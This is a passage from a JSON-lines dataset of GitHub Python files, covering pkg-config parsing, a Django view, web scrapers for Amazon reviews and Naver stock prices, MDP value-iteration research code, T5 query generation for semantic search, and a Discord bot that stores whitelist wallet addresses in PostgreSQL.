not Options().get_option('dont_define_prefix'):\n            # Use the location of the .pc file to guess a suitable value for\n            # the prefix variable. Start by checking if the absolute .pc \n            # location ends with '\\lib\\pkgconfig'.\n            abs_loc = dirname(abspath(self.filename))\n            if Options().get_option('normalise_paths'):\n                abs_loc = normpath(abs_loc)\n            else:\n                # If not normalising paths, then all paths should be in /\n                # format for consistency\n                abs_loc = abs_loc.replace('\\\\', '/')\n            if abs_loc.endswith('\\\\lib\\\\pkgconfig'):\n                # slice off the suffix (str.rstrip treats its argument as a set of characters, not a suffix)\n                self.variables[Options().get_option('prefix_variable')] = \\\n                    abs_loc[:-len('\\\\lib\\\\pkgconfig')]\n                ErrorPrinter().debug_print('Replaced {0} with \\\n{1}'.format(Options().get_option('prefix_variable'),\n                    self.variables[Options().get_option('prefix_variable')]))\n\n        # Perform substitutions\n        for key in props:\n            props[key] = substitute(props[key], self.variables,\n                                    global_variables)\n\n        # Parse the data\n        self.properties = deepcopy(empty_processed_props)\n        self.properties['name'] = props['name']\n        if props['description']:\n            self.properties['description'] = props['description']\n        if props['version']:\n            try:\n                self.properties['version'] = Version(props['version'])\n            except BadVersionFormatError as e:\n                raise BadVersionFormatError(e.versionstring, props['name'])\n        self.properties['requires'] = \\\n            parse_package_spec_list(props['requires'])\n        self.properties['requires.private'] = \\\n            parse_package_spec_list(props['requires.private']) + \\\n            self.properties['requires']\n        self.properties['conflicts'] = \\\n            parse_package_spec_list(props['conflicts'])\n        self._parse_cflags(props['cflags'], global_variables)\n        self._parse_libs(props['libs'], global_variables)\n        self._parse_libs(props['libs.private'], global_variables, dest='private.')\n\n    def _parse_cflags(self, value, global_variables):\n        flags = shlex.split(value, posix=False)\n        for flag in flags:\n            if flag.startswith('-I'):\n                if flag[2:] not in \\\n                        Options().get_option('forbidden_cflags'):\n                    # Prepend pc_sysrootdir if necessary\n                    pc_sysrootdir = global_variables.get('pc_sysrootdir', None)\n                    if pc_sysrootdir:\n                        # Strip the leading slashes from the flag path\n                        # because os.path.join() will ignore\n                        # pc_sysrootdir if it thinks the flag is an\n                        # absolute path\n                        include_dir = join(pc_sysrootdir,\n                                           flag[2:].strip().lstrip('/'))\n                    else:\n                        include_dir 
= flag[2:].strip()\n if Options().get_option('full_compatibility') and \\\n include_dir:\n # Drop everything after the first space when trying\n # to be fully compatible (sucky behaviour on Win32).\n include_dir = include_dir.split()[0]\n if sys.platform == 'win32':\n if Options().get_option('normalise_paths'):\n include_dir = normpath(include_dir)\n else:\n include_dir = include_dir.replace('\\\\', '/')\n self.properties['include_dirs'].append(include_dir)\n else:\n self.properties['other_cflags'].append(flag.strip())\n\n\n def _parse_libs(self, value, global_variables, dest=''):\n # Parse lib flags\n libs = shlex.split(value)\n skip_next = False\n for ii, lib in enumerate(libs):\n if skip_next:\n # Possibly skip an entry that was eaten by a -framework\n skip_next = False\n continue\n if lib.startswith('-l'):\n self.properties[dest + 'libs'].append(lib[2:].strip() + \\\n self.lib_suffix)\n elif lib.startswith('-L'):\n if lib[2:] not in \\\n Options().get_option('forbidden_libdirs'):\n # Prepend pc_sysrootdir if necessary\n pc_sysrootdir = global_variables.get('pc_sysrootdir', None)\n if pc_sysrootdir:\n # Strip the leading slashes from the flag path\n # because os.path.join() will ignore\n # pc_sysrootdir if it thinks the flag is an\n # absolute path\n libpath = join(pc_sysrootdir,\n lib[2:].strip().lstrip('/'))\n else:\n libpath = lib[2:].strip()\n if Options().get_option('full_compatibility'):\n # Drop everything after the first space when trying\n # to be fully compatible (sucky behaviour on Win32).\n libpath = libpath.split()[0]\n if sys.platform == 'win32':\n if Options().get_option('normalise_paths'):\n libpath = normpath(libpath)\n else:\n libpath = libpath.replace('\\\\', '/')\n self.properties[dest + 'libpaths'].append(libpath)\n elif lib.startswith('-framework'):\n self.properties[dest + 'otherlibs']. 
\\\n append(libs[ii + 1].strip() + self.lib_suffix)\n skip_next = True\n else:\n self.properties[dest + 'otherlibs'].append(lib.strip() + \\\n self.lib_suffix)\n\n\n# vim: tw=79\n\n","repo_name":"gbiggs/pykg-config","sub_path":"pykg_config/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"30614904691","text":"# from django.shortcuts import render\nfrom django.views.generic.edit import FormView\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .forms import ScapeForm\nfrom .models import ScapePlayer\nimport time\n# from datetime import datetime, timedelta\n# from django.http import HttpResponse\n\n\nclass ScapeView(FormView):\n template_name = 'scape/scape.html'\n form_class = ScapeForm\n # choices = [(x[0], str(x[1]) + \" days\") for x in settings.DONATION_AMOUNTS]\n\n def get_context_data(self, **kwargs):\n context = super(ScapeView, self).get_context_data(**kwargs)\n context['steam'] = self._get_steam()\n context['current_players'] = self._get_current_players()\n # if self.request.user.is_authenticated():\n # try:\n # all_donations = PremiumDonation.objects.filter(user=self.request.user)\n # if len(all_donations):\n # context['donation'] = all_donations.reverse()[0]\n # else:\n # context['donation'] = PremiumDonation.objects.get(user=self.request.user)\n # if context['donation'].end_time > timezone.now():\n # context['donation_ended'] = False\n # else:\n # context['donation_ended'] = True\n # except PremiumDonation.DoesNotExist:\n # context['donation'] = None\n # else:\n # context['donation'] = None\n return context\n\n def _get_steam(self):\n if self.request.user.is_authenticated():\n try:\n u = self.request.user.social_auth.filter(provider=\"steam\").get()\n return u.uid\n except ObjectDoesNotExist:\n pass\n\n return None\n\n # def get_initial(self):\n # \"\"\"\n # Returns the initial data to use for forms on this view.\n # \"\"\"\n #\n # steam = self._get_steam()\n #\n # domain = get_current_site(self.request).domain\n #\n # initial = {\n # \"business\": settings.PAYPAL_RECEIVER_EMAIL,\n # \"item_name\": \"Donation\",\n # \"invoice\": str(steam)+\":\"+uuid.uuid4().hex,\n # \"notify_url\": \"http://\" + \"localhost:8000/\" + reverse('paypal-ipn'),\n # \"return_url\": \"http://localhost:8000/donate\",\n # \"cancel_return\": \"http://localhost:8000/donate\",\n # \"custom\": steam, # Custom command to correlate to some function later (optional)\n # }\n #\n #\n # return initial\n\n def _get_current_players(self):\n try:\n # query_results = ScapePlayer.objects.all().order_by('-duration')\n query_results = ScapePlayer.objects.all()\n for player in query_results:\n # sec = timedelta(seconds=player.duration)\n # d = datetime(1, 1, 1) + sec\n #\n # # print(\"DAYS:HOURS:MIN:SEC\")\n # player.duration = (\"%d:%d:%d:%d\" % (d.day - 1, d.hour, d.minute, d.second))\n a = player.duration # last epoch recorded\n b = int(time.time()) # current epoch time\n c = b - a # returns seconds\n days = c / 86400\n hours = c / 3600 % 24\n minutes = c / 60 % 60\n seconds = c % 60\n player.duration = \"{} days, {} hours, {} minutes, {} seconds.\".format(days, hours, minutes, seconds)\n except ScapePlayer.DoesNotExist:\n query_results = \"None\"\n return 
query_results","repo_name":"aldenjenkins/ThiccGaming","sub_path":"site/thicc/apps/scape/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41146792546","text":"import scrapy\n\nclass FirstSpider(scrapy.Spider):\n name = \"reviewer\"\n#scrapy crawl reviewer -o a.json\n start_urls=[\n 'https://www.amazon.com/AhaStyle-Upgrade-Protective-Silicone-Compatible/product-reviews/B077187F2R/ref=cm_cr_dp_d_show_all_btm?ie=UTF8&reviewerType=all_reviews'\n ]\n\n def parse(self, response):\n for div in response.xpath('//div[@class=\"a-section celwidget\"]'):\n name=div.xpath('div[@class=\"a-row a-spacing-mini\"]/a/div/span/text()').extract_first()\n id=div.xpath('div[@class=\"a-row a-spacing-mini\"]/a/@href').re(\"\\\\w{28}\")[0]\n star=div.xpath('div[@class=\"a-row\"]/a/i/span/text()').extract_first()\n verified=div.xpath('div[@class=\"a-row a-spacing-mini review-data review-format-strip\"]/span/a/span/text()').extract_first()\n date=div.xpath('span[@class=\"a-size-base a-color-secondary review-date\"]/text()').extract_first()\n #print(name+' '+star+' '+id+' '+verified+' '+date)\n yield {\n 'name':name,\n 'id':id,\n\n 'rating':star,\n 'verified status':verified,\n 'date':date\n }\n\n next=\"https://www.amazon.com\"+response.xpath('//li[@class=\"a-last\"]/a/@href').extract_first()\n yield scrapy.Request(next)\n\n #next='https://www.amazon.com'+response.xpath('//li[@class=\"a-last\"]/a/@href').extract_first()\n #print(next)\n #yield scrapy.Request(next)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jokernight820/amazontest","sub_path":"zhiyuan_test/zhiyuan_test/spiders/firstSpider.py","file_name":"firstSpider.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11736923163","text":"from pymongo import mongo_client\nfrom bs4 import BeautifulSoup\nimport requests\n\nweburl = \"https://finance.naver.com/item/sise_day.nhn?code=068270&page=1\"\nresponse = requests.get(weburl, headers={'User-agent':'Mozilla/5.0'})\nsource = response.text\n\nurl = \"mongodb://localhost:27017/\"\nmgClient = mongo_client.MongoClient(url)\ndb = mgClient[\"parkdb\"]\ncol = db[\"address\"]\n\nsoup = BeautifulSoup(source, 'lxml')\ntd_pgRR = soup.find('td', class_='pgRR')\na_href = td_pgRR.a['href']\na_href_split_list = a_href.split(\"=\")\nlast_page = a_href_split_list[-1]\n\nimport pandas as pd\ndf = pd.DataFrame()\nbase_url = \"https://finance.naver.com/item/sise_day.nhn?code=068270\"\n#for page in range(1, int(last_page)+1):\nfor page in range(1, 3):\n url = \"{}&page={}\".format(base_url, page)\n response = requests.get(url, headers={'User-agent':'Mozilla/5.0'})\n source = response.text\n html = pd.read_html(source, header=0)[0]\n df = pd.concat([df, html])\ndf = df.dropna()\ndf = df.sort_values(by='날짜')\ndf = df.to_dict('records')\n\n#print(df)\n\n#col.insert_many(df)\n#where = {\"종가\":{\"$gt\":185000}} # 종가가 185000보다 큰 값만 출력\n#where = {\"날짜\":{\"$gte\":\"2022.07.01\"}} #날짜가 2022.07.01이후의 값만 출력\n#where = {\"날짜\":{\"$lte\":\"2022.06.29\"}} #날짜가 2022.06.29이전의 값만 출력\nwhere = {\"시가\":{\"$gte\":160000}} #시가가 160000원 이상의 값만 출력\ndocs = col.find(where, {\"_id\":0, \"날짜\":1})\nfor doc in docs:\n 
print(doc)\n#col.drop()","repo_name":"pjs845/test","sub_path":"day05_mongodb/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40321982206","text":"# coding=utf-8\nfrom __future__ import (\n    absolute_import, division, print_function, unicode_literals\n)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import *\n\nfrom src.core.mdp import State, Action, MDP, TransitionFunction\nfrom src.util.math_utils import make_time_string, t2n, softmax\n\nABS = 0\nREL = 1\n\n\nclass TMDPTransition(TransitionFunction):\n    def __init__(self, env=None):\n        TransitionFunction.__init__(self, env)\n\n    def __call__(self, state, action, **kwargs):\n        pass\n\n\nclass TMDPState(State):\n    def __init__(self, state_id, symbol, time_index):\n        super(TMDPState, self).__init__(state_id)\n        self.symbol = symbol\n        self.time_index = time_index\n        self.time_label = make_time_string(self.time_index)\n        self._actions = {}\n\n    def actions(self):\n        return self._actions\n\n    def add_action(self, action):\n        if action.action_id not in self._actions:\n            self._actions[action.action_id] = action\n\n    def get_all_outcomes(self, aid):\n        return self._actions[aid].outcomes\n\n    def outcome(self, aid):\n        outcomes = self.get_all_outcomes(aid)\n        return np.random.choice(outcomes[:, 1], replace=False, p=outcomes[:, 0].astype(float))\n\n    def __hash__(self):\n        return hash((self.state_id, self.time_index))\n\n    def __eq__(self, other):\n        return self.state_id == other.state_id and self.time_index == other.time_index\n\n    def __str__(self):\n        return '[{} @ {}]'.format(self.symbol, self.time_label)\n\n    def __repr__(self):\n        return self.__str__()\n\n\nclass TMDPAction(Action):\n    def __init__(self, action_id, action_label):\n        super(TMDPAction, self).__init__(action_id)\n        self.action_label = action_label\n        self._outcomes = []\n\n    @property\n    def outcomes(self):\n        return np.asarray(self._outcomes)\n\n    @outcomes.setter\n    def outcomes(self, outcomes):\n        self._outcomes = np.asarray(outcomes)\n\n    def add_outcome(self, outcome):\n        self._outcomes.append(outcome)\n\n    def __str__(self):\n        return self.action_label\n\n    def __repr__(self):\n        return self.__str__()\n\n    def __eq__(self, other):\n        return self.action_id == other.action_id\n\n    def __hash__(self):\n        return hash(self.action_id)\n\n\nclass TMDP(MDP):\n    def __init__(self, reward_function,\n                 transition,\n                 horizon,\n                 discretization,\n                 initial_state,\n                 state_types,\n                 action_types):\n        super(TMDP, self).__init__(reward_function, transition, graph=None, gamma=0)\n        self.action_types = action_types\n        self._action_dict = dict((v, t) for v, t in enumerate(self.action_types))\n        self._actions = None\n        self._state_types = state_types\n        self._initial_state = initial_state\n        self.horizon = horizon\n        self.disc = discretization  # assumed in minutes for now\n        self._tidx = int(self.horizon / self.disc)\n        self._states = np.zeros([len(self._state_types), self._tidx], dtype=object)\n        self._terminals = None\n\n    def set_outcomes(self, outcomes):\n        self._outcomes = outcomes\n\n    @property\n    def initial_state(self):\n        return self._initial_state\n\n    @property\n    def A(self):\n        return self._action_dict\n\n    def available_actions(self, state):\n        return self._states[state].available_actions()\n\n    @property\n    def S(self):\n        return self._states\n\n    def get_outcome(self, s, t, a):\n        return self._states[s][t].get_random_outcome(a)\n\n    def approximate_value_iteration(self, r, threshold=1e-16, gamma=1, 
temperature=1):\n\n nA = len(self._action_dict.keys())\n nS = len(self._states)\n V = np.zeros(nS, dtype=np.float64)\n Q = np.zeros([nS, nA], dtype=np.float64)\n i = 0\n diff = float(\"inf\")\n\n while diff > threshold:\n V_prev = np.copy(V)\n\n for s_idx, state_x in enumerate(self.S):\n if state_x in self._terminals:\n continue\n actions = state_x.available_actions()\n for a in actions:\n Q[s_idx, a] = sum([o[0] * (r[s_idx][o[1].state_id] + V_prev[o[1].state_id])\n for o in actions[a].outcomes])\n V = softmax(Q, temperature)\n diff = np.amax(np.abs(V_prev - V))\n\n i += 1\n print(diff)\n print(i)\n if diff == 0:\n V = V.reshape((-1, 1))\n expt = lambda x: np.exp(x / temperature)\n policy = expt(Q - V)\n\n # Stochastic policy... make sure that ∀ \\sum_a p(a|s) == 1\n assert np.allclose(policy.sum(1), np.ones(nS))\n return policy, Q, V\n\n def _assign_pdf_abs(self, s_to, time_span, scale):\n start, middle, end = time_span\n X = truncnorm((start - middle) / scale, (end - middle) / scale, loc=middle, scale=scale)\n raw_p = X.pdf(range(start, end, self.disc))\n tot = sum(raw_p)\n rescaled = raw_p / tot\n t_ids = (np.array(list(range(start, end, self.disc))) / self.disc).astype(int)\n states = [self._states[s_to][t_id] for t_id in t_ids]\n return zip(rescaled, states)\n\n def _assign_pdf_rel(self, s_to, t_id_in, time_span, scale):\n start, middle, end = time_span\n X = truncnorm((start - middle) / scale, (end - middle) / scale, loc=middle, scale=scale)\n raw_p = X.pdf(range(start, end, self.disc))\n tot = sum(raw_p)\n rescaled = raw_p / tot\n t_ids = (np.array(list(range(start, end, self.disc))) / self.disc).astype(int)\n new_t_ids = [t_id + t_id_in for t_id in t_ids]\n states = [self._states[s_to][new_t_id] for new_t_id in new_t_ids]\n return zip(rescaled, states)\n\n\ndef mk_Trans_mat(mdp):\n s_arr = np.array([s for sub in mdp.S for s in sub])\n a_arr = np.array(mdp.A.keys())\n nS = len(s_arr)\n nA = len(a_arr)\n P = np.zeros([nA, nS, nS], dtype=np.float32)\n for s in s_arr:\n for a_idx, a in s.available_actions().items():\n outcomes = a.outcomes\n sps = [o.state_id for o in outcomes[:, 1]]\n ps = [p for p in outcomes[:, 0]]\n for p, sp in zip(ps, sps):\n P[a_idx, s.state_id, sp] = p\n return P\n\n\ndef initialize_test_mdp(mdp):\n action_dict = mdp._action_dict\n\n ## A0|dawdling (all states):\n k, v = action_dict.items()[0]\n\n s_id = mdp._tidx - 1\n for s, label in enumerate(mdp.state_types):\n st = list(reversed(range(mdp._tidx)))\n for t, tidx in zip(st, np.arange(mdp.horizon - mdp.disc, -mdp.disc, -mdp.disc)):\n if t == mdp._states.shape[1] - 1:\n state = TMDPState(s_id, label, mdp.horizon - mdp.disc)\n dawdling = TMDPAction(k, v)\n dawdling.add_outcome([1.0, state])\n state.add_action(dawdling)\n else:\n state = TMDPState(s_id, label, tidx)\n dawdling = TMDPAction(k, v)\n dawdling.add_outcome([1.0, mdp._states[s][t + 1]])\n state.add_action(dawdling)\n mdp._states[s][t] = state\n s_id -= 1\n s_id = ((s + 2) * mdp._tidx) - 1\n\n ## A1|morning commute by pt:\n k, v = action_dict.items()[1]\n morning_pt_arrival_ts = t2n(9, 10), t2n(9, 45), t2n(10, 20)\n pt_sd = 12.5\n sf, st = int(t2n(7, 0) / mdp.disc), int(t2n(7, 50) / mdp.disc)\n for t in range(sf, st):\n commute_by_pt = TMDPAction(k, v)\n commute_by_pt.outcomes = mdp._assign_pdf_abs(2, morning_pt_arrival_ts, pt_sd)\n mdp._states[0][t].add_action(commute_by_pt)\n\n ## A2|driving to work via highway:\n k, v = action_dict.items()[2]\n off_peak_ts = t2n(0, 30), t2n(1, 30), t2n(2, 30) #\n car_sd = 25.5\n sf, st = int(t2n(7, 0) / mdp.disc), 
int(t2n(7, 20) / mdp.disc) # 7:20\n\n for t in range(sf, st):\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n\n sf, st = int(t2n(7, 30) / mdp.disc), int(t2n(7, 50) / mdp.disc)\n for t in range(sf, st):\n drive_hway = TMDPAction(k, v)\n\n # prob of rush increasing from 07:20 (state 2) with prob 0.0 to 08:00 (state 6) with prob 1.0\n # the prob of rush hour/off peak for state 3,4,5 are 0.25/0.75,0.50/0.50, 0.75/0.25\n outcomes = []\n\n # rush hour\n rush_hour_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, rush_hour_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n\n # off peak\n off_peak_ts = mk_ts([[0, 30], [1, 30], [2, 30]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n drive_hway.outcomes = outcomes\n mdp._states[0][t].add_action(drive_hway)\n\n ##\n sf, st = int(t2n(8, 00) / mdp.disc), int(t2n(9, 30) / mdp.disc)\n rush_hr_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n for t in range(sf, st): # 8:00 ~ 9:30\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, rush_hr_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n sf, st = int(t2n(9, 40) / mdp.disc), int(t2n(10, 10) / mdp.disc)\n for t in range(sf, st): # 09:40 ~ 10:10\n drive_hway = TMDPAction(k, v)\n outcomes = []\n # rush hour\n rush_hour_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, rush_hour_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n\n # off peak\n off_peak_ts = mk_ts([[0, 30], [1, 30], [2, 30]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n drive_hway.outcomes = outcomes\n mdp._states[0][t].add_action(drive_hway)\n\n off_peak_ts = t2n(0, 30), t2n(1, 30), t2n(2, 30) #\n sf, st = int(t2n(10, 20) / mdp.disc), int(t2n(14, 30) / mdp.disc)\n for t in range(sf, st): # 10:20(20) ~ 14:00(42)\n # off peak\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n\n ## A3|driving to work via backroad:\n k, v = action_dict.items()[3]\n for t in range(0, mdp._tidx):\n new_tid = t + int(t2n(1, 00) / 10)\n drive_hway = TMDPAction(k, v)\n if new_tid < mdp._tidx:\n drive_hway.outcomes = [(1.0, mdp._states[2][new_tid])]\n else:\n drive_hway.outcomes = [(1.0, mdp._states[2][mdp._tidx - 1])]\n mdp._states[1][t].add_action(drive_hway)\n mdp._terminals = [s[-1] for s in mdp._states]\n mdp.T = mk_Trans_mat(mdp)\n mdp._states = [s for sub in mdp.S for s in sub]\n return mdp\n\n\ndef mk_ts(arr):\n return tuple(map(lambda x: t2n(x[0], x[1]), (arr[0], arr[1], arr[2])))\n\n\ndef init_test_rewards(states):\n dim_s = len(states)\n rewards = np.zeros([dim_s, dim_s], dtype=np.float32)\n for s_from in states:\n for s_to in states:\n if s_to.symbol == 'Work' and s_from.symbol != 'Work':\n a, b = s_to.time_label.split(\":\")\n time = t2n(*tuple([int(e) for e in (a, b)]))\n if time < t2n(11, 00):\n rewards[s_from.state_id][s_to.state_id] = 1.0 # +1 for arriving at work before 11:00\n elif time < t2n(12, 00):\n rewards[s_from.state_id][s_to.state_id] = (t2n(12, 00) - time) / t2n(1,\n 00) # falls linearly to zero (11:00 ~ 12:00)\n else:\n rewards[s_from.state_id][s_to.state_id] = 0.0\n else:\n 
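# every transition that does not newly arrive at 'Work' earns no reward\n                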
rewards[s_from.state_id][s_to.state_id] = 0.0\n    return rewards\n\n\nif __name__ == '__main__':\n    activity_types = ['Home', 'Work', 'x2']\n    action_types = ['dawdling', 'commute_by_pt', 'driving to work via highway', 'driving on backroad']\n\n    mdp = TMDP(None, None, 1200, 5, 'home', activity_types,\n               action_types)\n    initialize_test_mdp(mdp)\n    reward = init_test_rewards(mdp.S)\n    p, Q, V = mdp.approximate_value_iteration(reward)\n    plt.plot(range(len(V)), V)\n    plt.show()\n    print(p.sum(1))\n","repo_name":"sfwatergit/da-irl","sub_path":"src/core/tmdp.py","file_name":"tmdp.py","file_ext":"py","file_size_in_byte":12486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39095188873","text":"\"\"\"\nIn this example we train a semantic search model to search through Wikipedia\narticles about programming languages & technologies.\n\nWe use the text paragraphs from the following Wikipedia articles:\nAssembly language, C , C Sharp , C++, Go , Java , JavaScript, Keras, Laravel, MATLAB, Matplotlib, MongoDB, MySQL, Natural Language Toolkit, NumPy, pandas (software), Perl, PHP, PostgreSQL, Python , PyTorch, R , React, Rust , Scala , scikit-learn, SciPy, Swift , TensorFlow, Vue.js\n\nIn:\n1_programming_query_generation.py - We generate queries for all paragraphs from these articles\n2_programming_train_bi-encoder.py - We train a SentenceTransformer bi-encoder with these generated queries. This results in a model we can then use for semantic search (for the given Wikipedia articles).\n3_programming_semantic_search.py - Shows how the trained model can be used for semantic search\n\"\"\"\nimport json\nimport gzip\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nimport torch\nimport tqdm\nimport os\nfrom sentence_transformers import util\n\nparagraphs = set()\n\n# We use the Wikipedia articles of certain programming languages\ncorpus_filepath = 'wiki-programmming-20210101.jsonl.gz'\nif not os.path.exists(corpus_filepath):\n    util.http_get('https://sbert.net/datasets/wiki-programmming-20210101.jsonl.gz', corpus_filepath)\n\nwith gzip.open(corpus_filepath, 'rt') as fIn:\n    for line in fIn:\n        data = json.loads(line.strip())\n\n        for p in data['paragraphs']:\n            if len(p) > 100: #Only take paragraphs with at least 100 chars\n                paragraphs.add(p)\n\nparagraphs = list(paragraphs)\nprint(\"Paragraphs:\", len(paragraphs))\n\n\n# Now we load the model that is able to generate queries given a paragraph.\n# This model was trained on the MS MARCO dataset, a dataset with 500k\n# queries from Bing and the respective relevant passage\ntokenizer = T5Tokenizer.from_pretrained('BeIR/query-gen-msmarco-t5-large-v1')\nmodel = T5ForConditionalGeneration.from_pretrained('BeIR/query-gen-msmarco-t5-large-v1')\nmodel.eval()\n\n#Select the device\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nmodel.to(device)\n\n# Parameters for generation\nbatch_size = 8 #Batch size\nnum_queries = 5 #Number of queries to generate for every paragraph\nmax_length_paragraph = 300 #Max length for paragraph\nmax_length_query = 64 #Max length for output query\n\n# Now for every paragraph in our corpus, we generate the queries\nwith open('generated_queries.tsv', 'w') as fOut:\n    for start_idx in tqdm.trange(0, len(paragraphs), batch_size):\n        sub_paragraphs = paragraphs[start_idx:start_idx+batch_size]\n        inputs = tokenizer.prepare_seq2seq_batch(sub_paragraphs, max_length=max_length_paragraph, truncation=True, return_tensors='pt').to(device)\n        outputs = model.generate(\n            **inputs,\n            
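# sample with nucleus (top-p) decoding so each passage yields num_queries different queries\n            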
max_length=max_length_query,\n do_sample=True,\n top_p=0.95,\n num_return_sequences=num_queries)\n\n for idx, out in enumerate(outputs):\n query = tokenizer.decode(out, skip_special_tokens=True)\n para = sub_paragraphs[int(idx/num_queries)]\n fOut.write(\"{}\\t{}\\n\".format(query.replace(\"\\t\", \" \").strip(), para.replace(\"\\t\", \" \").strip()))\n\n","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/unsupervised_learning/query_generation/1_programming_query_generation.py","file_name":"1_programming_query_generation.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"70945219347","text":"import psycopg2\nimport os\nfrom discord.ext import commands\nimport discord\nfrom time import sleep\n\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nbot = commands.Bot(command_prefix='!')\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n if message.guild:\n if not str('923579001010794527') in str(message.author.id) and str(message.channel.id) == '927245506130878504':\n if message.content == '!!help':\n await message.channel.send(getHelpMessage())\n elif message.content == '!!info':\n await message.channel.send(getInfoMessage())\n elif message.content == '!!check':\n result = readDatabase('check', message.author.id, message.content)\n if len(result) > 0:\n await message.channel.send('Your address is set: ' + str(result[0][0]))\n sleep(10)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('No address set yet.')\n elif str('!!set') in message.content:\n result = readDatabase('check', message.author.id, message.content)\n token = message.content.replace('!!set ', '')\n if len(result) == 1:\n await message.channel.send('Sorry! There is already set an address for this user.')\n sleep(10)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n if len(token) > 25:\n await message.channel.purge(limit=1)\n readDatabase('set', message.author.id, token)\n await message.channel.send('Address is set! Use **!!check** to verify!')\n sleep(7)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('Not a valid token address!')\n elif str('!!update') in message.content:\n result = readDatabase('check', message.author.id, message.content)\n token = message.content.replace('!!update ', '')\n if len(result) == 0:\n await message.channel.send('Sorry! There is no address for this account yet.')\n else:\n if len(token) > 25:\n readDatabase('update', message.author.id, token)\n await message.channel.send('Address is updated! Use **>>check** to verify!')\n sleep(5)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('Not a valid token address!')\n\n\ndef getHelpMessage():\n welcomeMessage = f\"\\nWelcome to the Whitelist bot!\\n\" \\\n \"Example: !!set 0xCD90d9bA0060937c442C5560055a785Ed428E1F9\\n\" \\\n \"**Commands**\\n\" \\\n \"```!!info : why is this BOT here?\\n\" \\\n \"!!check : will return the current address saved for your current discord ID\\n\" \\\n \"!!set
<address> : whitelist is closed\\n\" \\\n                     \"!!update <address> 
: will update your address\\n```\"\n\n return welcomeMessage\n\n\ndef getInfoMessage():\n infoMessage = f\"```This bot is made to set all whitelist addresses so you can get access to our presale of the VeeParrots-NFT collection.\\n\" \\\n \"If you don't set a valid address, you will not be able to mint NFT's in our presale.```\"\n return infoMessage\n\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n\ndef readDatabase(type, value, value2):\n global connection\n try:\n connection = psycopg2.connect(user=os.getenv('USER'),\n password=os.getenv('PASSWORD'),\n host=os.getenv('HOST'),\n port=5432,\n database=os.getenv('DATABASE'))\n cursor = connection.cursor()\n\n result = ''\n\n if type == 'check':\n query = 'SELECT address, name FROM public.whitelists w where name = \\'' + str(value) + '\\''\n cursor.execute(query)\n result = cursor.fetchall()\n\n if type == 'set':\n postgres_insert_query = \"\"\" INSERT INTO public.whitelists(address, name) VALUES (%s, %s)\"\"\"\n record_to_insert = (value2, value)\n cursor.execute(postgres_insert_query, record_to_insert)\n connection.commit()\n result = cursor.rowcount\n if type == 'update':\n postgres_insert_query = \"\"\" UPDATE public.whitelists SET address=(%s), name=(%s) WHERE name = (%s);\"\"\"\n record_to_insert = (value2, value, str(value))\n cursor.execute(postgres_insert_query, record_to_insert)\n connection.commit()\n result = cursor.rowcount\n\n print('res', result)\n return result\n\n\n except (Exception, psycopg2.Error) as error:\n print(error)\n return str(error)\n\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n\n\nclient.run(TOKEN)\n","repo_name":"FullStackDevFrancis/whitelist-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18404340879","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport argparse\nimport warnings\nimport astropy.io.fits as fits\n\nwarnings.filterwarnings('ignore')\n\n\ndef load_keys(keys_file):\n try:\n with open(keys_file) as f:\n keys = [k.strip('\\n') for k in f.readlines()]\n except (IOError, TypeError):\n 